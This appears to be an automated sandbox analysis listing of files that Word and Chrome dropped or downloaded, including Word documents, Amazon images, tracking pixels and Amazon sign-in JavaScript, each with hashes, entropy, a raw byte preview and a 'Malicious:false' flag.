                                                                                                                                                                                                                                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3465076
                                                                                                                                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19359
                                                                                                                                                                                                                                                                Entropy (8bit):7.469536317461405
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Jrt+BNxt/ZtNNUfxI4+qwT6rdMxzw8ggF2Oq6m+9njjV:VAxllNSImsvlUNtmV
                                                                                                                                                                                                                                                                MD5:BD0F738F5F1D32A177351A903F580FAA
                                                                                                                                                                                                                                                                SHA1:B25F776A5D8246C5A6B2D035BCAC742997C62EB5
                                                                                                                                                                                                                                                                SHA-256:9F4B29888BA89E6D5A958EA65A406B1FC4849D8AE7C99C5324D4C9FECE1FEBF7
                                                                                                                                                                                                                                                                SHA-512:940DFC0019613278230034A6BCB5C85E6C9AAEE6A72106F34F5DE9C4F22885C510FE5BBB8E06C81D2B1028501A2B6EE8EF2368BB55B9AEAEC4FB907A33F42428
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                                                                                Entropy (8bit):3.685522802157563
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:KVGl/lilKlRAGl/h6lNmKKI3ljpPewKh7J3lmbtElll/vmKdXNKk:KVy/4KDZ00KKIBpPewKNJ3lmbtMlt+Kz
                                                                                                                                                                                                                                                                MD5:5F6B3AFBD738FC37EDEB7888597FA0F0
                                                                                                                                                                                                                                                                SHA1:353E57AD69DCA4BBF533BA8DAF266528A4121351
                                                                                                                                                                                                                                                                SHA-256:FC8C45016814F297A1C8AAA8DF292381B6E3C8C02EA2DFAF1F0D9C0FA37A3A39
                                                                                                                                                                                                                                                                SHA-512:82DDC964C0A69BF40B0B90E21E227FA53E05294DDE4251E2029A5546F5A8EA487C3A5711FF69E3596A18E747F8A572BF60B4838B73EE0FE0808DC120C0E42217
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.user..................................................j.o.n.e.s.............`.`......1/.Xz9kM...../....i....`.`......B/.............M...............`.`.82/..B/.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19359
                                                                                                                                                                                                                                                                Entropy (8bit):7.469536317461405
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Jrt+BNxt/ZtNNUfxI4+qwT6rdMxzw8ggF2Oq6m+9njjV:VAxllNSImsvlUNtmV
                                                                                                                                                                                                                                                                MD5:BD0F738F5F1D32A177351A903F580FAA
                                                                                                                                                                                                                                                                SHA1:B25F776A5D8246C5A6B2D035BCAC742997C62EB5
                                                                                                                                                                                                                                                                SHA-256:9F4B29888BA89E6D5A958EA65A406B1FC4849D8AE7C99C5324D4C9FECE1FEBF7
                                                                                                                                                                                                                                                                SHA-512:940DFC0019613278230034A6BCB5C85E6C9AAEE6A72106F34F5DE9C4F22885C510FE5BBB8E06C81D2B1028501A2B6EE8EF2368BB55B9AEAEC4FB907A33F42428
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                                                                                Entropy (8bit):4.775448856309527
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:KVGl/lilKlRAGlwavK85sQGzzq8Hga2l6ittbf/Y+iRGNrn:KVy/4KDfC8OXzq8Ht2l6ojwRUr
                                                                                                                                                                                                                                                                MD5:F2E6112D8A34DB5AB068AC9FAC4E0E5E
                                                                                                                                                                                                                                                                SHA1:36C797E10BD3B81C0CF3AE2C1674D76BB3C4186F
                                                                                                                                                                                                                                                                SHA-256:A7CAA0DB991D0D7A28CEA5B2FD308A3104AD2D7D2E32E5BFAAD99B82CCD543AC
                                                                                                                                                                                                                                                                SHA-512:294D1FE1BDE5C35DE13067889E61089E4EDC4DA4622320A507CFE3ECE06ACD7EECFBE1039F9D3D112AC2FD7A4B04DA00DF0D56520C80695D031207CEB6710B79
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.user..................................................j.o.n.e.s........K.>.3.8..RQ "U.:..'......F.y.L.....DL....yeN&..7l3_)Gm..........c>.$/.}..j.........=.i
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7638
                                                                                                                                                                                                                                                                Entropy (8bit):7.894141029119417
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TApPGYqQwCfrE7QwiUsL5oG7HMQXFcVmESTL0Hiv9WdhITTv7Qh2PbkTH7QfEeCM:EoYnzE7QwbdoHrF5hTUiv9WkTwQMHfxY
                                                                                                                                                                                                                                                                MD5:8685B97B3710F3462A9FEA1E4EBEFB8F
                                                                                                                                                                                                                                                                SHA1:5D419D445E320F04C48E4AC31775CE30FD77C7F1
                                                                                                                                                                                                                                                                SHA-256:642C5DA6BEFFDE57ECEC1919FD2C805B2A09797CFA3CCCD01E5891534F3B4522
                                                                                                                                                                                                                                                                SHA-512:824E400478606117BFE8794FE2DBC28A66CD8F91F19FFCECE38755107F97DBA936220F42E98A104F4A2CA6D164EA19189C4F448ACE0A5C0E5335C60B011C7315
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61YiGh5SWaL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.........................................................................T.rl..w.VA.".......(Z..]..lt.....\9...0i.>..,.<G...v........)s.../Uk...P..'....D.[(;.$M.......D....g..R.U...<I.D.i. w.'J.....v.*#.U&....e.).....c .+..}d.#l.fA.`..w...z....=u..W....i.N.]..Z..,.E.R.N_.....Il...Y:)........ ....}.aAcTN...M.[.Rq.XU.....A8...a7t,.......-.....n.&.....)3...;/..\....V...^.....U...@....E...._I...z....Z.e..6..+...G..b.V..V$n.....C....k....Uo..x..~.L...&.|.).].....<.&.......8......y....c....k........S\.:...W.....z.}~.U.z....Y...#Ia..v...9.\jT.rm./yE.....r.}........=.............:}./.Zu.[......N.gc...uw.y?]f..wt..*..6......g{.>....E....5....c..A.Xn......+.........................!01A. ".2BQ@Ra#3.............h.S.I>..T.n.....t.....%.....K....c...8..[&].n7....^.yxo..'...."..G....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 118x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8206
                                                                                                                                                                                                                                                                Entropy (8bit):7.962789794101196
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:mTNLVTuOUMAN8Sw1FdyjkxKEH2O39YoEbw7eLOoHpR895iiZJh:mTBVTuOUrN8Sw1FdGkxKEHT+dbw7eioU
                                                                                                                                                                                                                                                                MD5:6D0868091DDA3B515F63D534A924E419
                                                                                                                                                                                                                                                                SHA1:D615F995C1872C6C8BB3DB1ECF06CAF92C14DD6E
                                                                                                                                                                                                                                                                SHA-256:DC14CFE7159942187114F6DBC5926B2F2646A8278925CE37CB30A84626BCF598
                                                                                                                                                                                                                                                                SHA-512:BDC93C3B429E1D5BA42DF33ECAF061652C07833F0FC4931E5359D00C9ED7542F0C822EC363CAE2BB0ADBDCEB3F5693B54774FA5124C409EC93286B1219AE1A11
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71fUZu5nc0L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........v.."..............................................................!.1.."AQ.aq...Rt......#2BTcs........35SUbr..$%4du..6CD....................................................!1A..."2Qaq...3BR....#4br.$%...............?...d3..+.L./q3-T.B.d"t.m._..y.$W#.KT..X...G.....h............'.C...(.......@%H....lee{s.....Ra.T.q..<=WRyE6....[..z.[...[..o./.=R....7.Rq.S]_......].".K.....v.&...x..3.Q...vH\."..4l..ln.q.{..=.G...G.^Q..JK.8.].z[.L.....9..<..I.<.8. ....{..~..TX....|........KVT.~b..K...S.h y.=..C..'5....%..C....F.Nlu.............S...$&#.3.H.C.m=...`B.yZ]..W..43G.d.G.N[.?..@..<....Zu>.].K.y..9..>cS..~`.a.......H#.4..?..*...........w..A;.X.7.'K3.D..,?.....y.$.No..U.....*....j.5/.b..4N"$wZ......+..y...W..<|.+3....5/.....BGu.:...|.....I..^.(..i..u.;n...:.sb...........j...{X0.......N.8.$lb.B.!q.UW.$fY.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8748
                                                                                                                                                                                                                                                                Entropy (8bit):7.95244573180809
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:VXd5HHc/fpgKt3SHTzTVSjmwsDeG3mNCX6gJKAL3hOJp7IPumS:myKtIDQyeG3m8X6CKAb4Jp7Ic
                                                                                                                                                                                                                                                                MD5:CE95B998747DE43B386D235B6B586ADE
                                                                                                                                                                                                                                                                SHA1:EF66A3EB0EDFA6263CF17A842EF7F9C69EDDAC06
                                                                                                                                                                                                                                                                SHA-256:CD95000D1EB2CE914871FB251C1C6E6D372B577C96658DE4408FC7E022C0CEBD
                                                                                                                                                                                                                                                                SHA-512:EAE7C05AF492B5B6B3164E588BD19AE43D42FAF4A2FC64E9BACA1D680E3C482EBE219FD3D42158EF3D94A61791D85A58478D9096E4B0A879F711768166F90C5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/617JAxuDpkL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!1."Q.ASa...#2.qt..35b...u..$6BC.................................................!...1a.Q"2A#q.........34Bb..............?....+.M.JR.E)J!..(.R...JT.....y+.k.....P.7G-.....Z.=..m#29.M7^.#g...}.....{.I....<...Q..)..l.lxYgk./qs..hq.][!.[..m.I~n..2.j..*.|k..VW.T...$..wX.......=&..R^9Yb.T..'..uqO._;..9............pu..H.@.*..ui.|/.\fB...h.^7_...........U>..U....bs..v..\.O%."P..R../.%U..w.5.TU....q...;.X%..O7Z.f...=.&....&.c...+..v!O..H.9.#.W4.r..)J!..(.R...JR.E)J!..p...k.=..v...m......WO..O....R.a..W#.o.{..t..r.k.#..H.e|l.\.K.(m................#..y..".A.5)=N.A.o..j.....J..\|...J.9....\.........2...H.?M.....\..siwyq.9.c).........;....vq.f#.X.]B5..*O.i$.....E...lx...M=...4qZ.V4...Xz..cQ.#.g-.6v..cc...."Y{...3..4.~N.....m.4.N.....J...R..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.303055907333275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:tXCqT3+DrMPobI:tSie7bI
                                                                                                                                                                                                                                                                MD5:A07DC0DCB3FB41B414A9626B05FC5470
                                                                                                                                                                                                                                                                SHA1:3CE0158D5B3E426F63E6E0E34C7B4E51AFC7DE11
                                                                                                                                                                                                                                                                SHA-256:EE6AA3BC45F6690319DCDE86BC5FFB031A6C1181E9300B2728BF3C57D8286026
                                                                                                                                                                                                                                                                SHA-512:3FE652B0877CA7BD1691C6D121702882609958304A13281C5B7173B6250D3228C8F50F917674AB807C20FDB3C13C6C24C724F26759477649FEA169C041B40FA1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl4TpaSdb1MGhIFDYOoWz0SBQ3OQUx6?alt=proto
                                                                                                                                                                                                                                                                Preview:ChwKDQ2DqFs9GgQIVhgCIAEKCw3OQUx6GgQISxgC
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1890
                                                                                                                                                                                                                                                                Entropy (8bit):7.367047187069556
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmRcA+e7extGxWJNUlmGKGJA28v6na/sLDO0lDFlYyl3c7PZm:TT0r6YexM1lm1QekFVl3L+7M
                                                                                                                                                                                                                                                                MD5:D27543C60F4C70F976C975C0B93F0F58
                                                                                                                                                                                                                                                                SHA1:4AF8B208EA3814F90530670CE451366537C735F8
                                                                                                                                                                                                                                                                SHA-256:553D093E7A5A19DAC1E3C97562282CDA22B66708B461FE920C522608891FC7AC
                                                                                                                                                                                                                                                                SHA-512:D5CEC30E218505B2A9F901220321FACEB2E4578DC21E5A47ED5A0B8E2503C6CB90FB8E13627A9C2E28B61D7CC9CC0CCE8248000127A7EE0B569B2AA2B9E08ED7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1A."2Q..3Ba...CRqr..b......................................................!1..Qaq."A2R...............?.....O..............................................................y.K..Q.u.....?6.i.E_Q..qEI.*}...&..&....{TW|...fV.......r......yq,.....]..}.-,.\.K.n..(>.%..E.b.%M.....r.J.M5......}.....\....n......k^n-..5..d...!.T*-\..Z.M..[.../k\..`W.a_...O.3...+....X.,.fl.,.>sT..U..-.?.W_7...q.*.skZ\.4.j...k..*.&.V8./....(b....N....(...j.-5.N...........8...)M..).I.F)n.od...._L.e)..Yw!oXk..T..Hs~r...6.Z.T#..n......G........;Bi.CvM..V.=#V3......{..#Y.-...J...a........Z..{....C,.RY.n.......p.pIZ.J....Z|...*.p......^..tk...i...k3.....e...............K....v.V..U...Z.!RQj.[Kh.....Rwk....f..V....r...'J.H{.....Q..>.....]i..$..3...Kl....5FU.*.J]G.=..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D1282%26pc%3D4795%26at%3D4795%26t%3D1723469072161%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:4795
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):23071
                                                                                                                                                                                                                                                                Entropy (8bit):5.362022943440696
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:sy2yQbKsU21yv1Dkd/boShcX4l35wG0oVEnHc5gCACPjNiFQ/2CW+LjdzO7hdV8s:sy2yQbKsU21Wkd/0ShcX4/wposHc5gDh
                                                                                                                                                                                                                                                                MD5:62192A2790221BF486B9095F17BEF7D4
                                                                                                                                                                                                                                                                SHA1:DC949DE562891047F3EFAD89167D1EC8FCD7F674
                                                                                                                                                                                                                                                                SHA-256:9EEAE9DBCF91FA4C0161C41AD6D85E8B088EE44E8C76260582D9F7CB0A20EB52
                                                                                                                                                                                                                                                                SHA-512:1316452B542FAF980332F54CA384A1E4C6D2CBD6C0049E9B7619D47C57122D4489BB6B3FCF466AB080349BE0FE9E1B30F6DA184F2F818FDEA20F48C774D3BEC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/41OBN8WDTZL.js?AUIClients/CVFAssets
                                                                                                                                                                                                                                                                Preview:P.register("cvfVersion",function(){return{version:"0.1.0.0-2024-08-09"}});"use strict";.P.when("A","cvfFormDataGenerator","cvf-client-side-counters-util","ready").register("cvf-account-switcher",function(b,k,a){function n(a,d){a.preventDefault();var c=k.retrieveFormData(a.target),h=c.inputData.serializeArray();h.push(e(a.target));b.ajax(window.location.protocol+"//"+window.location.host+c.requestPath,{method:"POST",params:h,success:d,error:f})}function e(a){a=h(a);var b=a.attr("name");b||(b=a.closest(".cvf-account-switcher-sign-out-link").attr("data-name"));var d=a.attr("value");d||.(d=a.closest(".cvf-account-switcher-sign-out-link").attr("data-value"));return{name:b,value:d}}function f(a,d,c){b.trigger(p.error,c)}function c(a){var b=/([^@\s]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9._-]+)/ig.exec(a);if(null!==b){a=b[1];a=h.trim(a);var d=a.length;if(1!==d){for(var c=a.charAt(0),e=0;e<d-2;e++)c+="*";a=c+=a.charAt(d-1)}a+="@";c=b[2];c=h.trim(c);d=c.length;c=c.charAt(0);for(e=0;e<d-1;e++)c+="*";ret
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D7585%26at%3D7585%26t%3D1723469085491%26csmtags%3DendVL%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7584
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 244x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):19723
                                                                                                                                                                                                                                                                Entropy (8bit):7.971435295662351
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:I/WiPpzP4AiXQX7dv/vuhFwgt3O6ByCq2C21yq2J3iT6pjjWjR9K89G7b:GVBzQwX7dvXuh3eZDH21yqwimpujPKj
                                                                                                                                                                                                                                                                MD5:BD24737681B3A2F4539F01644F3C4E3B
                                                                                                                                                                                                                                                                SHA1:744346B3F92B4B605186E9512A376C8D56EAF840
                                                                                                                                                                                                                                                                SHA-256:D609EDC3CE69706EE2426C603D881E4F2BE8CE18BF7892816B0A1C4F8EA730B7
                                                                                                                                                                                                                                                                SHA-512:DDDF597268CCEEE78F711825739F1F69CFC7B7343CDCFD47DA7E33624A2C621392CFD341FE9124BADD558FFA8B0D40071F1532AA592A5D70746E1302BD39E89F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71KCNSueOqL._AC_SY200_.jpg
